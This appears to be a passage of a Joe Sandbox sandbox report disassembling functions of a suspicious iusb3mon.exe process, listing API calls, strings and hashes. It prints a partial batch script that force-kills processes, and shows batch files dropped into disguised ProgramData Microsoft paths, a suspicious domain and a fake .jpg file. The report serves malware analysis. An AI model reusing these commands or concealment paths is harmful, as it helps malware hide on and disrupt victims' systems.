Opcode ID: b7c291c6623f14c652f9e7889654c6758b350f8bc76f90651c5bde9ef8f4bc3c
Instruction ID: 794987ec135a1e9fab79fa9bc53a362893a2c7084d570b9813c5d9a2617dc45b
Opcode Fuzzy Hash: b7c291c6623f14c652f9e7889654c6758b350f8bc76f90651c5bde9ef8f4bc3c
Instruction Fuzzy Hash: 72F096317202229FD6313B74A81C62A3FA4FB81B75B014629F565E62C0FF289C40ABA0

Function 04D7CF88 Relevance: 7.5, APIs: 5, Instructions: 34COMMON

Download Yara Rule

APIs

DeleteCriticalSection.KERNEL32(00000000,?,?,04D7CD75,04D7B68C,04D7B6E5,?,?,?), ref: 04D7CFBC

Part of subcall function 04D7B2B4: HeapFree.KERNEL32(00000000,00000000,00000000,04D78D56,00000000,?,04D80113,00000009,00000000,00000000,00000000,00000000,00000000,?,04D78D56,?), ref: 04D7B388

DeleteCriticalSection.KERNEL32(?,?,04D7CD75,04D7B68C,04D7B6E5,?,?,?), ref: 04D7CFD7
DeleteCriticalSection.KERNEL32 ref: 04D7CFDF
DeleteCriticalSection.KERNEL32 ref: 04D7CFE7
DeleteCriticalSection.KERNEL32 ref: 04D7CFEF

Memory Dump Source

Source File: 00000020.00000002.4547080784.0000000004D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D70000, based on PE: true

Associated: 00000020.00000002.4547080784.0000000004DA1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DAA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_4d70000_iusb3mon.jbxd

Yara matches

Similarity

API ID: CriticalDeleteSection$FreeHeap
String ID:
API String ID: 447823528-0
Opcode ID: 660b44c432fa93db934e9b34eb2e2ff7ca7d06e9709521c8fe26b8007c155310
Instruction ID: 1ca6b0ee4918e4cb14a4246ae2d05f8238abc0908c8fbc35c9e32a132ebbc87a
Opcode Fuzzy Hash: 660b44c432fa93db934e9b34eb2e2ff7ca7d06e9709521c8fe26b8007c155310
Instruction Fuzzy Hash: 56F08223E151246EAF74BB1AFC4C859EBA1EFC1730316013BD855E23F0D925BC81CA94

Function 04D7180D Relevance: 7.5, APIs: 5, Instructions: 28COMMONLIBRARYCODE

Download Yara Rule

APIs

setsockopt.WS2_32(?,0000FFFF,00000080,04D7546D,00000004), ref: 04D71832
CancelIo.KERNEL32(?), ref: 04D7183B
InterlockedExchange.KERNEL32(?,00000000), ref: 04D71847
closesocket.WS2_32(?), ref: 04D71850
SetEvent.KERNEL32(?), ref: 04D71859

Memory Dump Source

Source File: 00000020.00000002.4547080784.0000000004D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D70000, based on PE: true

Associated: 00000020.00000002.4547080784.0000000004DA1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DAA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_4d70000_iusb3mon.jbxd

Yara matches

Similarity

API ID: CancelEventExchangeInterlockedclosesocketsetsockopt
String ID:
API String ID: 1486965892-0
Opcode ID: aefb511ca34776098bfef659b1a70067a43a9296afc9c5faaf1e87db8684ab33
Instruction ID: e0e5fa17af3d68f4626d4d37c85c77ae44f08774f7c31592b73bd714299426b5
Opcode Fuzzy Hash: aefb511ca34776098bfef659b1a70067a43a9296afc9c5faaf1e87db8684ab33
Instruction Fuzzy Hash: 49F0DA71410715FFDB209B99DC0ABAA7BB8FF05324F10456CA682D16E0DBB6A9449B50

Function 04D8CAC0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 81windowCOMMON

Download Yara Rule

APIs

GetMenuCheckMarkDimensions.USER32 ref: 04D8CACC
CreateBitmap.GDI32(?,?,00000001,00000001,?), ref: 04D8CB7B
LoadBitmapA.USER32(00000000,00007FE3), ref: 04D8CB93

Strings

, xrefs: 04D8CADB

Memory Dump Source

Source File: 00000020.00000002.4547080784.0000000004D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D70000, based on PE: true

Associated: 00000020.00000002.4547080784.0000000004DA1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DAA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_4d70000_iusb3mon.jbxd

Yara matches

Similarity

API ID: Bitmap$CheckCreateDimensionsLoadMarkMenu
String ID:
API String ID: 2596413745-3916222277
Opcode ID: 07448f037053b9306c62cb6bb1d4972e73847b1b873b610de38bfa2177d3bb97
Instruction ID: 1ef0f2c5a809811ed9ba517284ebd6adf092b38a790713b581bf801febbdec2a
Opcode Fuzzy Hash: 07448f037053b9306c62cb6bb1d4972e73847b1b873b610de38bfa2177d3bb97
Instruction Fuzzy Hash: 3F210671E00214EFEB10DB68DC84BBEBBB8EF80704F0401A9E505EB281D634AA448B50

Function 00571F90 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 77COMMON

Download Yara Rule

APIs

___std_exception_copy.LIBVCRUNTIME ref: 0057202F

Part of subcall function 00576F34: RaiseException.KERNEL32(E06D7363,00000001,00000003,005711FC,?,?,?,?,005711FC,?,0059A814), ref: 00576F94

Strings

ios_base::badbit set, xrefs: 00571FC7, 00571FF2, 00572013
ios_base::failbit set, xrefs: 00571EC8, 00571FD1
ios_base::eofbit set, xrefs: 00571FD6

Memory Dump Source

Source File: 00000020.00000002.4542770236.0000000000571000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00570000, based on PE: true

Associated: 00000020.00000002.4542552949.0000000000570000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4542911854.000000000058E000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4543102062.000000000059C000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4543297688.000000000059E000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4543297688.00000000005A2000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4543297688.00000000005E3000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4543915174.00000000005FA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4544036943.00000000005FB000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4544036943.000000000063F000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4544283573.0000000000655000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4544283573.00000000006CA000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4544283573.00000000006D5000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4544283573.00000000006DF000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4544283573.00000000006E1000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4544283573.00000000006F7000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4544283573.0000000000741000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4545109642.00000000009D9000.00000020.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_570000_iusb3mon.jbxd

Similarity

API ID: ExceptionRaise___std_exception_copy
String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
API String ID: 3109751735-1866435925
Opcode ID: d34d8d2895ac17ff10dae889fa820fbee0230b2937426040a5ffe82ed1aaae3b
Instruction ID: d302c8a238b7072261f43e951aac763894bcc74821a1d797d56d37ff45a1c31a
Opcode Fuzzy Hash: d34d8d2895ac17ff10dae889fa820fbee0230b2937426040a5ffe82ed1aaae3b
Instruction Fuzzy Hash: C21105B2910B056BC710EF68E806B96BBECFF45310F04C52AFD5897641EB70A804DBA5

Function 04D74E65 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 56sleepfileCOMMON

Download Yara Rule

APIs

SHGetSpecialFolderPathA.SHELL32(00000000,?,0000001C,00000000), ref: 04D74E9D
DeleteFileA.KERNEL32(?), ref: 04D74EE0
Sleep.KERNEL32(000007D0), ref: 04D74F0F

Part of subcall function 04D74D89: SHGetSpecialFolderPathA.SHELL32(00000000,?,0000001C,00000000), ref: 04D74DBD
Part of subcall function 04D74D89: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 04D74E10
Part of subcall function 04D74D89: GetFileSize.KERNEL32(00000000,00000000), ref: 04D74E21
Part of subcall function 04D74D89: ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 04D74E3C
Part of subcall function 04D74D89: CloseHandle.KERNEL32(?), ref: 04D74E59

Strings

.dat, xrefs: 04D74ECB

Memory Dump Source

Source File: 00000020.00000002.4547080784.0000000004D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D70000, based on PE: true

Associated: 00000020.00000002.4547080784.0000000004DA1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DAA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_4d70000_iusb3mon.jbxd

Yara matches

Similarity

API ID: File$FolderPathSpecial$CloseCreateDeleteHandleReadSizeSleep
String ID: .dat
API String ID: 4140139616-100240174
Opcode ID: 1f6b694b769dc50dfd2672c7045201d6a13447565878be44f32096bb63ac976a
Instruction ID: 8b715a09c7326b1efdf2c73dd7c195bcd00c90ace2343213fd349ac00f6428c5
Opcode Fuzzy Hash: 1f6b694b769dc50dfd2672c7045201d6a13447565878be44f32096bb63ac976a
Instruction Fuzzy Hash: D811C1B5F14254ABFF21AF60D944BE977ACAB51314F04448AE2C592280F7B87AC48F21

Function 04D86228 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 53COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 04D8622D

Part of subcall function 04D7A00C: RaiseException.KERNEL32(04D84592,00000000,?,04D8F828,?,invalid string position,04D84592,00000000,04D917F8,?,invalid string position), ref: 04D7A03A

Strings

ios::badbit set, xrefs: 04D8625A
ios::eofbit set, xrefs: 04D8626B, 04D8627F, 04D86287
ios::failbit set, xrefs: 04D86264

Memory Dump Source

Source File: 00000020.00000002.4547080784.0000000004D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D70000, based on PE: true

Associated: 00000020.00000002.4547080784.0000000004DA1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DAA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_4d70000_iusb3mon.jbxd

Yara matches

Similarity

API ID: ExceptionH_prologRaise
String ID: ios::badbit set$ios::eofbit set$ios::failbit set
API String ID: 3968804221-425934345
Opcode ID: fec7c1b04d2dddd8173a7af4cc4f42736c5472bec57c56f69b7590a2d645c9c1
Instruction ID: 3c415f26bba1717506ab1dd0fe59bbcefc411987c0821093909e05e58996517c
Opcode Fuzzy Hash: fec7c1b04d2dddd8173a7af4cc4f42736c5472bec57c56f69b7590a2d645c9c1
Instruction Fuzzy Hash: 2B1152B2E01158BAEB01FBA4D490BFEB778EB1522CF04805DE955A7241E634F909CB60

Function 04D7ABCC Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 51COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(04D76D67,huazai168.com,04D7ABA8,00000000,00000000,00000000,04D76D67,00000000), ref: 04D7ABE1
TerminateProcess.KERNEL32(00000000), ref: 04D7ABE8
ExitProcess.KERNEL32 ref: 04D7AC69

Strings

huazai168.com, xrefs: 04D7ABCC

Memory Dump Source

Source File: 00000020.00000002.4547080784.0000000004D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D70000, based on PE: true

Associated: 00000020.00000002.4547080784.0000000004DA1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DAA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_4d70000_iusb3mon.jbxd

Yara matches

Similarity

API ID: Process$CurrentExitTerminate
String ID: huazai168.com
API String ID: 1703294689-2241639779
Opcode ID: 714fbd875d91bfebeac7a93142884837e15f50bce82e851702ee9e5a71fe2261
Instruction ID: 442dd808d1febe24133b43e0589a97ab47f9fcb84472bf9ad05233b52e06a9d9
Opcode Fuzzy Hash: 714fbd875d91bfebeac7a93142884837e15f50bce82e851702ee9e5a71fe2261
Instruction Fuzzy Hash: DF01C476708301BFEB10AF69F869A5E7FD5FB80310B000819F49597341EB34BC918E21

Function 04D74C6F Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 31fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(?,40000000,00000001,00000000,00000002,00000000,00000000,C:\ProgramData\Microsoft\EdgeUpdate\Log\kill.bat,?,?,04D75D6A,C:\ProgramData\Microsoft\EdgeUpdate\Log\kill.bat), ref: 04D74C85
WriteFile.KERNEL32(00000000,04D95680,00001F53,?,00000000,?,?,04D75D6A,C:\ProgramData\Microsoft\EdgeUpdate\Log\kill.bat), ref: 04D74C9D
CloseHandle.KERNEL32(00000000,?,?,04D75D6A,C:\ProgramData\Microsoft\EdgeUpdate\Log\kill.bat), ref: 04D74CAA

Strings

C:\ProgramData\Microsoft\EdgeUpdate\Log\kill.bat, xrefs: 04D74C75

Memory Dump Source

Source File: 00000020.00000002.4547080784.0000000004D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D70000, based on PE: true

Associated: 00000020.00000002.4547080784.0000000004DA1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DAA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_4d70000_iusb3mon.jbxd

Yara matches

Similarity

API ID: File$CloseCreateHandleWrite
String ID: C:\ProgramData\Microsoft\EdgeUpdate\Log\kill.bat
API String ID: 1065093856-3013772396
Opcode ID: 6d6fc6e4ed12daeaa9bf7b283cf70f14af954dbfa34dc44ef23d8e28d6628b19
Instruction ID: 39e6b7bda4a249ca800556ec5084a54b59a52ff0b04dd0f07f3c5ebf25937d25
Opcode Fuzzy Hash: 6d6fc6e4ed12daeaa9bf7b283cf70f14af954dbfa34dc44ef23d8e28d6628b19
Instruction Fuzzy Hash: 8CE01AB22922287FFB111A61AC9AFF77B5DEB067E8F004225FA04D5240D6666D448AA4

Function 04D729CE Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 31fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(?,40000000,00000001,00000000,00000002,00000000,00000000,00000000,75920F00,?,04D73E44,C:\ProgramData\Microsoft\del.bat,?,?), ref: 04D729E4
WriteFile.KERNEL32(00000000,@echo off 2>nul 3>nultimeout /t 5taskkill /im notepad.exe /ftaskkill /im microsoft.exe /ftaskkill /im iusb3mon.exe /ftaskkill /im iusb3mon.exe /ftaskkill /im iusb3mon.exe /ftaskkill /im rundll32.exe /ftaskkill /im rundll32.exe /ftaskkill ,00000F7D,?,00000000,?,04D73E44,C:\ProgramData\Microsoft\del.bat,?,?), ref: 04D729FC
CloseHandle.KERNEL32(00000000,?,04D73E44,C:\ProgramData\Microsoft\del.bat,?,?), ref: 04D72A09

Strings

@echo off 2>nul 3>nultimeout /t 5taskkill /im notepad.exe /ftaskkill /im microsoft.exe /ftaskkill /im iusb3mon.exe /ftaskkill /im iusb3mon.exe /ftaskkill /im iusb3mon.exe /ftaskkill /im rundll32.exe /ftaskkill /im rundll32.exe /ftaskkill , xrefs: 04D729F6

Memory Dump Source

Source File: 00000020.00000002.4547080784.0000000004D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D70000, based on PE: true

Associated: 00000020.00000002.4547080784.0000000004DA1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DAA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_4d70000_iusb3mon.jbxd

Yara matches

Similarity

API ID: File$CloseCreateHandleWrite
String ID: @echo off 2>nul 3>nultimeout /t 5taskkill /im notepad.exe /ftaskkill /im microsoft.exe /ftaskkill /im iusb3mon.exe /ftaskkill /im iusb3mon.exe /ftaskkill /im iusb3mon.exe /ftaskkill /im rundll32.exe /ftaskkill /im rundll32.exe /ftaskkill
API String ID: 1065093856-3151026013
Opcode ID: 250ae555e149f3fc921efa0a70a53b1adb966e68ad15dcc342b3753ec45b748f
Instruction ID: 796ee8df8d140193833fdb6616bb4b3dd9f6ad5c0acefae84d52716b90ba0f46
Opcode Fuzzy Hash: 250ae555e149f3fc921efa0a70a53b1adb966e68ad15dcc342b3753ec45b748f
Instruction Fuzzy Hash: A8E0DFB229622C7FFB201A60AC9AFFB7B5CEB027E8F000121FA04E5240D6516C008AB0

Function 04D75D5B Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 30processsleepCOMMON

Download Yara Rule

APIs

Part of subcall function 04D74C6F: CreateFileA.KERNEL32(?,40000000,00000001,00000000,00000002,00000000,00000000,C:\ProgramData\Microsoft\EdgeUpdate\Log\kill.bat,?,?,04D75D6A,C:\ProgramData\Microsoft\EdgeUpdate\Log\kill.bat), ref: 04D74C85
Part of subcall function 04D74C6F: WriteFile.KERNEL32(00000000,04D95680,00001F53,?,00000000,?,?,04D75D6A,C:\ProgramData\Microsoft\EdgeUpdate\Log\kill.bat), ref: 04D74C9D
Part of subcall function 04D74C6F: CloseHandle.KERNEL32(00000000,?,?,04D75D6A,C:\ProgramData\Microsoft\EdgeUpdate\Log\kill.bat), ref: 04D74CAA

Part of subcall function 04D71C74: SetFileAttributesA.KERNEL32(00000000,00000080,04D7682E,C:\ProgramData\Microsoft\Program\ziliao.jpg,00000000), ref: 04D71C88

WinExec.KERNEL32(C:\ProgramData\Microsoft\EdgeUpdate\Log\kill.bat,00000000), ref: 04D75D7E
Sleep.KERNEL32(000493E0), ref: 04D75D8C
WinExec.KERNEL32(C:\ProgramData\Microsoft\EdgeUpdate\Log\kill.bat,00000000), ref: 04D75DA2

Strings

C:\ProgramData\Microsoft\EdgeUpdate\Log\kill.bat, xrefs: 04D75D5E, 04D75D64, 04D75D6C, 04D75D7D, 04D75D8E, 04D75D96, 04D75DA1

Memory Dump Source

Source File: 00000020.00000002.4547080784.0000000004D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D70000, based on PE: true

Associated: 00000020.00000002.4547080784.0000000004DA1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DAA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_4d70000_iusb3mon.jbxd

Yara matches

Similarity

API ID: File$Exec$AttributesCloseCreateHandleSleepWrite
String ID: C:\ProgramData\Microsoft\EdgeUpdate\Log\kill.bat
API String ID: 3627572907-3013772396
Opcode ID: b4d4e3a7789e99ac1d39025918af4a5f3dda2bc19f5f3106eaaead5b3671cba6
Instruction ID: 1d2c3fd2c6cc5bbb5412cb1c2fdf2d9accce10e59f575215ee0ebe43386b5fa4
Opcode Fuzzy Hash: b4d4e3a7789e99ac1d39025918af4a5f3dda2bc19f5f3106eaaead5b3671cba6
Instruction Fuzzy Hash: B5E04F30611628BAF41272105C81F9F3A1CCF83758F060210F5047A391A6893F0184FE

Function 04D8B81C Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 27stringCOMMON

Download Yara Rule

APIs

GetWindowLongA.USER32(00000000,000000F0), ref: 04D8B82D
GetClassNameA.USER32(00000000,?,0000000A), ref: 04D8B848
lstrcmpiA.KERNEL32(?,combobox), ref: 04D8B857

Strings

combobox, xrefs: 04D8B851

Memory Dump Source

Source File: 00000020.00000002.4547080784.0000000004D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D70000, based on PE: true

Associated: 00000020.00000002.4547080784.0000000004DA1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DAA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_4d70000_iusb3mon.jbxd

Yara matches

Similarity

API ID: ClassLongNameWindowlstrcmpi
String ID: combobox
API String ID: 2054663530-2240613097
Opcode ID: c1432cec102cc320f3f71c6604b27df108e1561acfddcf91d7a73a078935c39e
Instruction ID: 1288e5c80b49dcf31edda19fd2ede72daf2bc469fb8f4dc9a917761461531f76
Opcode Fuzzy Hash: c1432cec102cc320f3f71c6604b27df108e1561acfddcf91d7a73a078935c39e
Instruction Fuzzy Hash: 96E0393166420DBBCF00AF64CC4AEB93BB8EB11749F108629F816D5190D634F655DA52

Function 04D7734F Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 25stringnetworkCOMMON

Download Yara Rule

APIs

Part of subcall function 04D791B3: LoadLibraryA.KERNEL32(ADVAPI32.dll,?,?,?,?,?,?,00000000,00000000,00006365), ref: 04D79216
Part of subcall function 04D791B3: GetProcAddress.KERNEL32(00000000,RegQueryValueExA), ref: 04D7922E
Part of subcall function 04D791B3: GetProcAddress.KERNEL32(?,RegOpenKeyExA), ref: 04D7923E
Part of subcall function 04D791B3: GetProcAddress.KERNEL32(?,RegEnumValueA), ref: 04D7924E
Part of subcall function 04D791B3: GetProcAddress.KERNEL32(?,RegEnumKeyExA), ref: 04D7925B
Part of subcall function 04D791B3: GetProcAddress.KERNEL32(?,RegCloseKey), ref: 04D79268
Part of subcall function 04D791B3: FreeLibrary.KERNEL32(?,?,?,?,?,?,?,00000000,00000000,00006365), ref: 04D793F3

lstrlenA.KERNEL32(?,?,?,?,?,04D77971,?,00000032,?,?,?,00000004), ref: 04D77383
gethostname.WS2_32(?,?), ref: 04D77392

Strings

Remarkbeizhu, xrefs: 04D7736B
Console, xrefs: 04D77370

Memory Dump Source

Source File: 00000020.00000002.4547080784.0000000004D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D70000, based on PE: true

Associated: 00000020.00000002.4547080784.0000000004DA1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DAA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_4d70000_iusb3mon.jbxd

Yara matches

Similarity

API ID: AddressProc$Library$FreeLoadgethostnamelstrlen
String ID: Console$Remarkbeizhu
API String ID: 4010645601-3228434003
Opcode ID: 5ca570b2339700961d18820f348fc0565409ee3cdff673eb119cfa8c0b7d8ca5
Instruction ID: 69b8fba728cec52ac1b8a95a006b12627f945e9371b7c5f26352c4b6b1f43df9
Opcode Fuzzy Hash: 5ca570b2339700961d18820f348fc0565409ee3cdff673eb119cfa8c0b7d8ca5
Instruction Fuzzy Hash: C7E08672696310BBEF112A609C0AFCF7BA6EF49714F004448F614B1180E7B575A18BAA

Function 04D7C069 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 13libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(KERNEL32,04D799FE), ref: 04D7C06E
GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 04D7C07E

Strings

IsProcessorFeaturePresent, xrefs: 04D7C078
KERNEL32, xrefs: 04D7C069

Memory Dump Source

Source File: 00000020.00000002.4547080784.0000000004D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D70000, based on PE: true

Associated: 00000020.00000002.4547080784.0000000004DA1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DAA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_4d70000_iusb3mon.jbxd

Yara matches

Similarity

API ID: AddressHandleModuleProc
String ID: IsProcessorFeaturePresent$KERNEL32
API String ID: 1646373207-3105848591
Opcode ID: d85df94e15991044f8fadbf0b1a9bd1f79f2bcd64463961205da73f91004c34f
Instruction ID: 780c31bfb75a9eda289aacd3497cfebac055e771b99005e71a59b8cb5acfeac3
Opcode Fuzzy Hash: d85df94e15991044f8fadbf0b1a9bd1f79f2bcd64463961205da73f91004c34f
Instruction Fuzzy Hash: 5FC002603A53127FEA702AB25C1AF36279CAF54E42F044A1CA806E5180EA65E4049E62

Function 04D7AF85 Relevance: 6.5, APIs: 5, Instructions: 278COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.4547080784.0000000004D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D70000, based on PE: true

Associated: 00000020.00000002.4547080784.0000000004DA1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DAA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_4d70000_iusb3mon.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9847bd3ff4f17a1828ac318b215a28b20c55f3f5108a4af141b7f8d8bea1fabd
Instruction ID: 462602530830eb8241eb448078d007697a83d9bf920ea62f17d03f8b330d39fb
Opcode Fuzzy Hash: 9847bd3ff4f17a1828ac318b215a28b20c55f3f5108a4af141b7f8d8bea1fabd
Instruction Fuzzy Hash: BC919471E01514AEDB21AF649C84ADE7BB4FB457A8F240617FC65B6290F731BD40CB60

